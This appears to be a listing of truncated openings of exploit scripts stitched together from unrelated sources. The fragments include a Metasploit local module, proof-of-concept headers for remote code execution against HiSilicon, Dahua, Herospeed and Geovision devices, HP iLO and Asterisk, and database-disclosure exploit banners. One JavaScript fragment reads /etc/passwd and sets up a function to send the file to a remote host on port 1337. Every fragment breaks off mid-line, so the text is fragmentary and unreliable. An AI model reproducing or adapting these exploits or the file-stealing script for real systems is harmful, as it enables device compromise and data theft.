## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit
/* AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. Here's the userclient's registerNotificationPort method: __text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient
body script var file = file:///etc/passwd ; var extract = http://dev.example.com:1337/ ; function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open(GET, url, false); xmlHttp.send(null); return xmlHttp.responseText; } function steal(data) {
#!/usr/bin/env python Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP: https://support.hpe.com/hpsc/doc/p
#!/usr/bin/env python2 # # pwn hisilicon dvr web service # from pwn import * from time import sleep import re import argparse import os parser = argparse.ArgumentParser(description='exploit HiSilicon DVR devices') parser.add_argument('--rhost', help=
#!/usr/bin/python2.7 if False: ''' 2017-05-03 Public rerelease of Dahua Backdoor PoC https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py 2017-03-20 With my newfound knowledge of vulnerable devices out there with an unbelievable number of mo
#!/usr/bin/env python2.7 # # Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd. # Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd. # # [Verified] # 1) Fullha
# Exploit Author: Juan Sacco jsacco@exploitpack.com - http://exploitpack.com # Vulnerability found using Exploit Pack v10 - Fuzzer module # CVE-2017-17090 - AST-2017-013 # # Tested on: Asterisk 13.17.2~dfsg-2 # # Description: Asterisk is prone to a r
#!/usr/bin/env python2.7 # # [SOF] # # Geovision Inc. IP Camera Video Server Remote Command Execution PoC # Researcher: bashis mcw noemail eu (November 2017) # ##########################################################################################
========================================================================| # Title : hava tahmin v1.0 Database Disclosure Exploit| # Author : indoushka| # email : indoushka4ever@gmail.com| # Tested on : windows 8.1 FranASSais V.(Pro)| # Version : v1.
========================================================================| # Title : hazir site v 2.2 Data base Disclosure Exploit| # Author : indoushka| # email : indoushka4ever@gmail.com| # Tested on : windows 8.1 FranASSais V.(Pro)| # Version : v2
